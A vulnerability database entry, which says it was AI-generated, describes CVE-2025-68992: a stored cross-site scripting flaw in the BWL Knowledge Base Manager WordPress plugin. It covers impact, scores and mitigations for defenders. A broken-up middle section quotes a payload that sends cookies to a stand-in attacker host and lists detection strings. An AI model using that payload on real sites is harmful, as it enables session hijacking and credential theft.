
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-68992 is a Stored Cross-Site Scripting (XSS) vulnerability in the BWL Knowledge Base Manager WordPress plugin (slug: bwl-kb-manager) developed by xenioushk. It affects all versions up to and including 1.6.3, with no official patch available as of the disclosure date. The vulnerability was reported by researcher Phat RiO on November 22, 2025, and published by Patchstack on December 22, 2025. It carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the Stored XSS variant. An attacker with at least Contributor-level privileges on a WordPress site can inject malicious scripts into fields managed by the BWL Knowledge Base Manager plugin; these scripts are then persistently stored and executed in the browsers of other users who visit the affected pages. Exploitation requires low attack complexity over a network vector, but does require user interaction (a privileged user must view the injected content) (Patchstack).
Successful exploitation allows an attacker to inject and persistently execute arbitrary JavaScript in the context of other users' browsers, including site administrators. This can lead to session hijacking, credential theft, unauthorized administrative actions, defacement, or redirection of visitors to malicious sites. The scope is changed (S:C), meaning the impact extends beyond the plugin's own context to affect the broader WordPress site and its visitors (Patchstack).
No public proof-of-concept exploit code has been identified at this time. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. There is no evidence of active in-the-wild exploitation or threat actor attribution, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack classifies this as low priority, though it notes that XSS vulnerabilities of this type are sometimes used in mass-exploit campaigns targeting WordPress plugins (Patchstack).
readme.txt files.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable input field.wp_posts or custom plugin tables) containing <script>, javascript:, or onerror= strings.As of the disclosure date, no official patched version of the BWL Knowledge Base Manager plugin is available. Site administrators should consider deactivating and removing the plugin until a fix is released. As a compensating control, restrict Contributor-level user registration and review existing Contributor accounts for trustworthiness. Deploying a web application firewall (WAF) with XSS filtering rules — such as those provided by Patchstack, Wordfence, or Cloudflare — can help block exploitation attempts in the interim (Patchstack).
Wordfence included CVE-2025-68992 in its weekly WordPress vulnerability report covering December 15, 2025 to January 4, 2026, indicating routine tracking of the issue within the WordPress security community (Wordfence). No significant vendor statements, researcher commentary, or broader media coverage have been identified beyond standard vulnerability database listings.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."